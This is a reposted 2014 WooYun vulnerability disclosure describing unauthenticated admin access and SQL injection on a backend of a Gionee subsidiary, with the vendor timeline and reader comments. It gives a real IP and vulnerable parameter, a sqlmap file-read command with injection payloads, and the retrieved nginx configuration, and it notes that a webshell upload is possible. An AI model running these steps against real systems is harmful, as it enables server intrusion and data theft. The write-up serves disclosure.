金立旗下奥软公司某后台未授权访问加注入致getshell

admin
admin
admin
140798
文章
117
评论
2015年7月16日23:38:35评论216 views字数 245阅读0分49秒阅读模式
摘要

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-28: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2014-80496

漏洞标题: 金立旗下奥软公司某后台未授权访问加注入致getshell

相关厂商: gionee.com

漏洞作者: ljhj

提交时间: 2014-10-23 18:44

公开时间: 2014-10-28 18:46

漏洞类型: 未授权访问/权限绕过

危害等级: 高

自评Rank: 20

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 安全意识不足 未授权访问 安全意识不足

1人收藏

漏洞详情

披露状态:

2014-10-23: 细节已通知厂商并且等待厂商处理中
2014-10-23: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

主要是未授权访问,而后找到注入一枚,权限极高,思路猥琐,不知道能不能加刀。

详细说明:

首先是通过搜索引擎大法找到后台:http://120.31.131.166:82/

发现是应用汇的后台,里面各种操作完全无权限限制,各种数据

金立旗下奥软公司某后台未授权访问加注入致getshell

金立旗下奥软公司某后台未授权访问加注入致getshell

金立旗下奥软公司某后台未授权访问加注入致getshell

发现数据量还是蛮大的。

接着找到注入一枚:http://120.31.131.166:82/soft_series_cps.php?series_id=-1

权限:root

金立旗下奥软公司某后台未授权访问加注入致getshell

好多数据库,不过想来想去只能脱裤子,什么都做不了,上不了马。

这边卡住了。

接着去尝试读取文件,发现系统的权限也挺高,什么文件都能读取。

但是不知道项目的目录,没办法读取他的项目文件。

又卡住了。。。

忽然我头顶的灯泡闪了两下,他的服务器是nginx的。那我是不是可以读取nginx的配置文件呢,这样我就可以知道他的项目都放在哪里,就可以写文件了。

于是去读取nginx的配置,发现也不知道他的nginx配置在哪里,,,

不过nginx配置放在哪里应该跟系统有关系,服务器是linux系统,读取/etc/issue文件,是centos。

然后百度了一下,知道centos的nginx配置放在/usr/local/nginx/conf/nginx.conf

ok go!

code 区域 
:~# sqlmap -u "http://120.31.131.166:82/soft_series_cps.php?series_id=-1" --file-read /usr/local/nginx/conf/nginx.conf
 
     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
     http://sqlmap.org
 
 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
 [*] starting at 15:55:18
 
 [15:55:18] [INFO] resuming back-end DBMS 'mysql' 
 [15:55:18] [INFO] testing connection to the target URL
 sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 ---
 Place: GET
 Parameter: series_id
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: series_id=-1 AND 1443=1443
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
     Payload: series_id=-1 AND (SELECT 4836 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (CASE WHEN (4836=4836) THEN 1 ELSE 0 END)),0x7167687071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 
     Type: AND/OR time-based blind
     Title: MySQL > 5.0.11 AND time-based blind
     Payload: series_id=-1 AND SLEEP(5)
 ---
 [15:55:18] [INFO] the back-end DBMS is MySQL
 web application technology: PHP 5.2.10, Nginx
 back-end DBMS: MySQL 5.0
 [15:55:18] [INFO] fingerprinting the back-end DBMS operating system
 [15:55:18] [INFO] the back-end DBMS operating system is Linux
 [15:55:18] [INFO] fetching file: '/usr/local/nginx/conf/nginx.conf'
 [15:55:18] [WARNING] reflective value(s) found and filtering out
 user nginx  nginx;   
 worker_processes  5;   
 error_log  logs/error.log  info; 
 pid        logs/nginx.pid;  
 worker_rlimit_nofile 65535; 
 events {
     use epoll   ; 
     worker_connections  65535;
 }
 http {
     include       mime.types;
     default_type  application/octet-stream;
     sendfile        on;
     tcp_nopush     on;
     keepalive_timeout  300;
     gzip  on;
   client_max_body_size 50m;
 
  fastcgi_connect_timeout 300;
     fastcgi_send_timeout 300;
     fastcgi_read_timeout 300;
     fastcgi_buffers 4 128k;
     fastcgi_busy_buffers_size 256k;
     fastcgi_temp_file_write_size 256k;
     fastcgi_buffer_size 256k; #/xe5/xbf/x85/xe9/xa0/x88/xe6/x9c/x89/xe7/x9a/x84/xef/xbc/x8c/xe6/xb3/xa8/xe6/x84/x8f/xe4/xba/x86
 
     server {
         listen       80;
         server_name  aora37.myaora.net; 
         charset utf-8;  
             root   /www/wwwmtk-tag/wap/wapadmin/wap; 
             index  index.php index.html index.htm; 
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
         
 location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
         fastcgi_intercept_errors on; 
             include        fastcgi_params;
         }
 
     }
 
 # added on 2011.03.17 anzhi
     server {
         listen       81;
         server_name  android.myaora.net;
         charset utf-8;
         root   /web/wwwroot/gomarket.goapk.com;
         index  index.php index.html index.htm;
         #error_page   500 502 503 504  /50x.html;
         #error_page   404 403  /404.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
     }
 
 
 
 server {
         listen       810;
         server_name  android.myaora.net;
         charset utf-8;
         root   /web_test/wwwroot/gomarket.goapk.com;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         #error_page   404 403  /404.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
     }
 
 
 server {
         listen       8100;
         server_name  android.myaora.net;
         charset utf-8;
         root   /gamecenter.com/gomarket.goapk.com/;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
 }
 
     server {
         listen       8200;
         server_name  android.myaora.net;
         charset utf-8;
         root   /gamecenter.com/admin.goapk.com/;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
 }
 
 
 
 server {
         listen       1008;
         server_name  freego.myaora.net;
         charset utf-8;
         root   /freego/wwwroot/admin.goapk.com/;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
 }
 
 
 
 
 server {
         listen       820;
         server_name  android.myaora.net;
         charset utf-8;
         root   /web_test/wwwroot/admin.goapk.com;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
 }
 
 
 
 
     server {
         listen       1007;
         server_name  freego.myaora.net;
         charset utf-8;
         root   /freego/wwwroot/gomarket.goapk.com;
         index  index.php index.html index.htm;
         error_page   500 502 503 504  /50x.html;
         location = /50x.html {
             root   html;
         }
 
         location ~ .*//.php$ {
             fastcgi_pass   unix:/var/run/fastcgi/fastcgi.socket;
             fastcgi_index  index.php;
             fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
             fastcgi_intercept_errors on;
             include        fastcgi_params;
         }
 
     }
 
 
 }
 do you want confirmation that the remote file '/usr/local/nginx/conf/nginx.conf' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
 [15:55:44] [INFO] retrieved: 5803
 [15:55:44] [INFO] the local file /usr/share/sqlmap/output/120.31.131.166/files/_usr_local_nginx_conf_nginx.conf and the remote file /usr/local/nginx/conf/nginx.conf have the same size
 files saved to [1]:
 [*] /usr/share/sqlmap/output/120.31.131.166/files/_usr_local_nginx_conf_nginx.conf (same file)
 
 [15:55:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/120.31.131.166'
 
 [*] shutting down at 15:55:44

哇,果然读出了nginx的配置。

看到了好多项目,但是具体不知道哪个项目。

又通过一遍遍的测试发现,我访问的后台放在/freego/wwwroot/admin.goapk.com/

至此,服务器能不能拿下已经显而易见了。只需要sqlmap传一个马到上面的路径下就可以了。

由于我是好学生,以及种种原因,我不想往上面放马。权限都有了,放马只差一个点击。如果非要放马才能证明严重性,请私信我,送大马一只,服务器shell。

漏洞证明:

由于前面有点迷茫,服务器各种翻,于是读出了许多文件,包括数据库的配置。

金立旗下奥软公司某后台未授权访问加注入致getshell

先是找到了/freego/wwwroot/admin.goapk.com/下的index.php文件

金立旗下奥软公司某后台未授权访问加注入致getshell

顺着这个找到了checklogin.php

金立旗下奥软公司某后台未授权访问加注入致getshell

接着又找到

金立旗下奥软公司某后台未授权访问加注入致getshell

终于找到了数据库的配置

金立旗下奥软公司某后台未授权访问加注入致getshell

未脱裤,通过sqlmap读取的文件也都已删除。

修复方案:

增加权限限制

版权声明:转载请注明来源 ljhj@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-28 18:46

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2014-10-28:已修补,非常感谢“路人甲”对我司作的安全贡献

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-24 12:44 | 掳人甲 ( 路人 | Rank:0 漏洞数:1 | .)

    1

    www.aoratec.com么、、应该没刀刀

  2. 2014-10-28 21:26 | 滔哥 ( 路人 | Rank:0 漏洞数:2 | 平常心!)

    0

    确定修补?

  3. 2014-10-28 21:51 | ljhj ( 路人 | Rank:29 漏洞数:7 | 专注弱口令30年,好品质值得信赖。)

    0

    可以告知为什么修补了却不给rank么?@疯狗

  4. 2014-10-28 22:00 | ljhj ( 路人 | Rank:29 漏洞数:7 | 专注弱口令30年,好品质值得信赖。)

    0

    而且也没修复,这是想把自己的服务器贡献出来?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin